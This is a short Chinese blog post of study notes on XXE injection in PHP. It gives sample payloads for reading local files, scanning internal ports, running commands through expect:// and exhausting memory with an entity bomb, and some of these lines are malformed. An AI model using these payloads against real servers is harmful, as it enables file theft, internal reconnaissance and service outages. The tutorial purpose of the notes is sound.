首页 > 其他分享 >XXE漏洞

XXE漏洞

时间:2023-08-21 15:48:04浏览次数:32  
标签:xml bomb XXE 端口扫描 漏洞 xxe

XXE漏洞

xml external entity injection外部实体注入

$xml = simplexml_load_string($data);//运行xml语句

危害:

可以读取磁盘上的文件

<?xml version="1.0" encoding="utf-8"?><!doctype note[<!ENTITY xxe SYSTEM "file://E://in.txt">]><login>&xxe;</login>

端口扫描

<!ENITY xxe SYSTEM "http://127.0.0.1:3306">

如果端口未开放会出现报错

执行命令

需要安装expect扩展

<?xml version="1.0" encoding="utf-8"?>

<!doctype note[

<!ENTITY xxe SYSTEM "expect://ipconfig">]>

<root>

<name>&xxe;</name>

</root>

对内网进行攻击

内容膨胀占用大量内存

 xxe炸弹,服务器中断

< !ENTITY bomb” file:///dev/random"I >]><msg>&bomb;</msg>

 

标签:xml,bomb,XXE,端口扫描,漏洞,xxe
From: https://www.cnblogs.com/L-1906/p/17644601.html

相关文章

  • XXE防范
    1、在php、java代码中xml代码前加入禁用实体解析的代码php:libxml_disable_entity.loader(true);¥xml=simplexml_load_string($xmlContent);java:DocumentBuilderFactorydbf=DocumentBuilderFactory.newlnstance();dbf.setExpandEntityReferences(false);2、过滤用户提交......
  • XXE漏洞--xml基础知识
    一、XML基础知识可以用于配置文件、交换数据要求:XML文档必须有根元素XML文档必须有关闭标签XML标签对大小写敏感XML元素必须被正确嵌套XML属性必须加引号DTD(DocumentTypeDefinition)文档类型定义自动校验格式内容,元素ELEMENT校验实体ENTITY定义字符或值,相当于全局变......
  • 漏洞复现报告:CVE-2017-18349
    漏洞简介CVE-2017-18349是Fastjson1.2.24版本中的一个反序列化漏洞,该漏洞可能导致远程代码执行(RCE)。Fastjson是一种用于处理JSON数据的Java库,该漏洞允许hacker通过构造恶意的JSON数据来执行任意代码。漏洞原理fastjson在解析json对象时,会使用autoType实例化某一个具体的类,并调用se......
  • 大华智慧园区综合管理平台SQL注入漏洞复现
    一、产品简介大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。二、漏洞概述大华智慧园区综合管理平台未对用户的输入进行有效的过滤,直接将其拼接进了S......
  • nacos权限绕过漏洞(CVE-2021-29441)修复过程
    1、开启服务身份识别功能修改nacos的application.properties配置文件nacos.core.auth.enabled=true,2、重启nacos进入nacos下的bin目录单机模式shstartup.sh-mstandalone集群shstartup.shNacos3、注册及配置中心开启权限认证,所有服务都要改重新发版......
  • 漏洞修复访问控制方法-目的是为了躲避上面检查
    #!/bin/bash#2022年9月19日14点58分#设置环境变量./etc/init.d/functionsexportPATH=$PATH:/bin:/sbin:/usr/sbinexportLANG="en_US.UTF-8"source/etc/profile#停止防火墙,并清空防火墙策略systemctlstopiptablesiptables-F#iptables-F-tnatiptables-X......
  • 常见的Web安全漏洞有哪些,Web安全漏洞常用测试方法介绍
    Web安全漏洞是指在Web应用程序中存在的可能被攻击者利用的漏洞,正确认识和了解这些漏洞对于Web应用程序的开发和测试至关重要。一、常见的Web安全漏洞类型:1、跨站脚本攻击(Cross-SiteScripting,XSS):攻击者通过向Web页面注入恶意脚本来执行恶意操作,例如窃取用户敏感信息......
  • Apache HTTPd RCE漏洞复现(cve-2021-41773)
    0x01漏洞简介:      ApacheHTTPd是Apache基金会开源的一款流行的HTTP服务器。在ApacheHTTPd2.4.49版本中,存在一个路径穿越漏洞。在配置了Requireallgranted后,攻击者可利用路径穿越漏洞读取到Web目录之外的其他文件,比如/etc/passwd文件。同时若ApacheHTTPd开启了......
  • Hytec Inter HWL-2511-SS popen.cgi命令注入漏洞
    页面是以下这个屌样 poc/cgi-bin/popen.cgi?command=ping%20-c%204%201.1.1.1;cat%20/etc/shadow&v=0.1303033443137921 ......
  • PHP反序列化漏洞笔记(一):初识序列化
    PHP类与对象类:一组共享相同结构和和行为的对象集合对象:类的实例使用new的关键字Phpmagic函数在PHP中,魔术方法(MagicMethods)是一组特殊的函数,它们以双下划线(__)作为前缀来命名。这些函数在特定的情况下会自动调用,以执行一些特定的操作。以下是一些常用的魔术方法:实践:自动化的操作:......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99